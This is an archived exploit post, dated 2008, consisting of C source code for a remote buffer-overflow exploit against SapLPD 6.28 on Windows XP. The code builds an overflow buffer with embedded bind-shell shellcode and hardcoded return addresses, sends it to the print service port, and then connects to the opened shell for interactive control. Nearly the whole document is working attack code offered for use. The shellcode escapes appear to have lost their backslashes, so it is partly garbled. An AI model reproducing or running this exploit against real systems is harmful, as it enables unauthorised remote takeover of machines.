saplpd-overflow.txt
Posted on 08 February 2008
/* http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060042.html Exploit for SapLPD 6.28 Win32 by BackBone Tested with SapLPD 6.28 on Windows XP SP2 Groetjes aan mijn sletjes Ops,Doop,Gabber,head,ps,sj,dd en de rest! */ #include <stdio.h> #include <winsock2.h> #include <windows.h> #pragma comment (lib,"ws2_32") #define DEFAULT_PORT 515 char ASCII_SHIT[]= " " " ______ ______ " " (, / ) /) (, / ) " " /---( _ _ (/_ /---( _____ _ " " ) / ____)(_(_(__/(__) / ____)(_) / (__(/_ " " (_/ ( (_/ ( (c) 2008 " " "; struct { LPSTR lpVersion; DWORD dwOffset; DWORD dwRetAddr; BYTE bLPDCmd; } targets[]= { // exploit works with cmd 0x01,0x02,0x03,... {"SAPLPD Version 6.28 for Windows/NT (TEST)",484,0x0012F0A1,0x01}, // addr of shellcode -> 0x0012F0A1 {"SAPLPD Version 6.28 for Windows/NT",484,0x004E0BB7,0x01}, // jmp esp 0x004E0BB7 -> SAPLpd.exe 6.28 },v; // don't change the offset #define PORT_OFFSET 170 #define BIND_PORT 10282 // bindshell shellcode from www.metasploit.com,mod by skylined unsigned char shellcode[] = "xebx43x56x57x8bx45x3cx8bx54x05x78x01xeax52x8bx52" "x20x01xeax31xc0x31xc9x41x8bx34x8ax01xeex31xffxc1" "xcfx13xacx01xc7x85xc0x75xf6x39xdfx75xeax5ax8bx5a" "x24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01" "xe8x5fx5exffxe0xfcx31xc0x64x8bx40x30x8bx40x0cx8b" "x70x1cxadx8bx68x08x31xc0x66xb8x6cx6cx50x68x33x32" "x2ex64x68x77x73x32x5fx54xbbx71xa7xe8xfexe8x90xff" "xffxffx89xefx89xc5x81xc4x70xfexffxffx54x31xc0xfe" "xc4x40x50xbbx22x7dxabx7dxe8x75xffxffxffx31xc0x50" "x50x50x50x40x50x40x50xbbxa6x55x34x79xe8x61xffxff" "xffx89xc6x31xc0x50x50x35x02x01x70xccxfexccx50x89" "xe0x50x6ax10x50x56xbbx81xb4x2cxbexe8x42xffxffxff" "x31xc0x50x56xbbxd3xfax58x9bxe8x34xffxffxffx58x60" "x6ax10x54x50x56xbbx47xf3x56xc6xe8x23xffxffxffx89" "xc6x31xdbx53x68x2ex63x6dx64x89xe1x41x31xdbx56x56" "x56x53x53x31xc0xfexc4x40x50x53x53x53x53x53x53x53" "x53x53x53x6ax44x89xe0x53x53x53x53x54x50x53x53x53" "x43x53x4bx53x53x51x53x87xfdxbbx21xd0x05xd0xe8xdf" "xfexffxffx5bx31xc0x48x50x53xbbx43xcbx8dx5fxe8xcf" "xfexffxffx56x87xefxbbx12x6bx6dxd0xe8xc2xfexffxff" "x83xc4x5cx61xebx89"; #define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p); BOOL StartupWinsock(void) { WSADATA wsa; return !WSAStartup(MAKEWORD(2,0),&wsa); } DWORD LookupAddress(LPSTR lpHost) { DWORD dwRemoteAddr=inet_addr(lpHost); if (dwRemoteAddr==INADDR_NONE) { struct hostent* pHostEnt=gethostbyname(lpHost); if (pHostEnt==0) return INADDR_NONE; dwRemoteAddr = *((DWORD*)pHostEnt->h_addr_list[0]); } return dwRemoteAddr; } SOCKET TCPConnect(DWORD dwIP,WORD wPort,DWORD dwTimeout) { struct sockaddr_in sock_in; struct timeval timeout; DWORD fdWrite[2]; DWORD fdExcept[2]; SOCKET s; int slResult; int val=1,len=sizeof(int); s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (s==INVALID_SOCKET) return SOCKET_ERROR; ioctlsocket(s,FIONBIO,(u_long*)&val); fdWrite[0]=fdExcept[0]=1; fdWrite[1]=fdExcept[1]=s; memset(&sock_in,0,sizeof(sock_in)); sock_in.sin_port=wPort; sock_in.sin_family=AF_INET; sock_in.sin_addr.s_addr=dwIP; connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in)); timeout.tv_sec=dwTimeout/1000; timeout.tv_usec=dwTimeout%1000; slResult=select(0,NULL,(fd_set*)&fdWrite,(fd_set*)&fdExcept,&timeout); switch(slResult) { case -1: case 0: { closesocket(s); return SOCKET_ERROR; } default: { if (!FD_ISSET(s,(fd_set*)&fdExcept)) { val=0;ioctlsocket(s,FIONBIO,(u_long*)&val); return s; } break; } } closesocket(s); return SOCKET_ERROR; } /* ripped from TESO code and modifed by ey4s for win32 */ void Shell(int s) { int l; char buf[512]; struct timeval time; unsigned long ul[2]; time.tv_sec=1; time.tv_usec=0; while(1) { ul[0]=1; ul[1]=s; l=select(0,(fd_set*)&ul,NULL,NULL,&time); if(l==1) { l=recv(s,buf,sizeof(buf),0); if (l<=0) { printf(" [-] connection closed. "); return; } l=write(1,buf,l); if (l<=0) { printf(" [-] connection closed. "); return; } } else { l=read(0,buf,sizeof(buf)); if (l<=0) { printf(" [-] connection closed. "); return; } l=send(s,buf,l,0); if (l<=0) { printf(" [-] connection closed. "); return; } } } } void ShowBanner(void) { printf("%s",ASCII_SHIT); } void ShowSploit(void) { printf(" SAPlpd 6.28 Multiple Remote Buffer Overflows "); printf(" Advisory by Luigi Auriemma "); printf(" Exploit By BackBone "); printf(" "); } void ShowUsage(char* argv) { int i; printf("[*] %s host/ip[:port] target [bindport] ",argv); printf("[*] Default port: %d - Default bindport: %d ",DEFAULT_PORT,BIND_PORT); printf("[*] Target(s): "); for (i=0;i<(sizeof(targets)/sizeof(v));i++) printf(" %2d: %s (0x%08x) ",i,targets[i].lpVersion,targets[i].dwRetAddr); } int main(int argc, char* argv[]) { LPSTR lpHost,lpPort; ULONG ulIP; USHORT usPort; USHORT usBindPort; SOCKET sSock; int iTarget; int iLen=0; char lpBuffer[16384]; ShowBanner(); ShowSploit(); // check arguments if (argc<3||argc>4) { ShowUsage(argv[0]); return -1; } // get host/ip lpHost=strtok(argv[1],":"); // get port lpPort=strtok(NULL,":"); if (lpPort) usPort=(USHORT)atoi(lpPort); else usPort=DEFAULT_PORT; // startup winsock if (!StartupWinsock()) { printf("[-] WSAStartup() Failed. "); return -1; } // resolve host ulIP=LookupAddress(lpHost); if (ulIP==INADDR_NONE) { printf("[-] Invalid IP/Host. "); WSACleanup(); return -1; } // get target iTarget=atoi(argv[2]); if (iTarget<0||iTarget>(sizeof(targets)/sizeof(v))-1) { printf("[-] Invalid target. "); WSACleanup(); return -1; } printf("[+] Target: %s (0x%08x) ",targets[iTarget].lpVersion,targets[iTarget].dwRetAddr); if (argc==4) usBindPort=(USHORT)atoi(argv[3]); else usBindPort=BIND_PORT; SET_BIND_PORT(usBindPort); // connecting printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF, (ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usPort); // connect sSock=TCPConnect(ulIP,htons(usPort),10000); if (sSock==SOCKET_ERROR) { printf("Failed! "); WSACleanup(); return -1; } printf("Ok. "); // construct buffer memset(lpBuffer,0,sizeof(lpBuffer)); *lpBuffer=targets[iTarget].bLPDCmd; iLen+=1; memset(lpBuffer+iLen,0x90,targets[iTarget].dwOffset-sizeof(shellcode)); iLen+=targets[iTarget].dwOffset-sizeof(shellcode); memcpy(lpBuffer+iLen,shellcode,sizeof(shellcode)); iLen+=sizeof(shellcode); memcpy(lpBuffer+iLen,&targets[iTarget].dwRetAddr,4); iLen+=4; memcpy(lpBuffer+iLen,"xE9x98x08x00x00",5); // jmp esp will execute this code, jmp to shellcode iLen+=5; memset(lpBuffer+iLen,0x41,1);// saplpd zeroes this byte iLen+=1; printf("[+] Sending buffer (size:%d) ... ",iLen); // send buffer if (send(sSock,lpBuffer,iLen,0)<=0) { printf("Failed! "); WSACleanup(); return -1; } printf("Ok. "); closesocket(sSock); Sleep(1000); // connecting printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF, (ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usBindPort); // connect to bindshell sSock=TCPConnect(ulIP,htons(usBindPort),10000); if (sSock==SOCKET_ERROR) { printf("Failed! "); WSACleanup(); return -1; } printf("Ok. "); // shell Shell(sSock); closesocket(sSock); WSACleanup(); return 0; }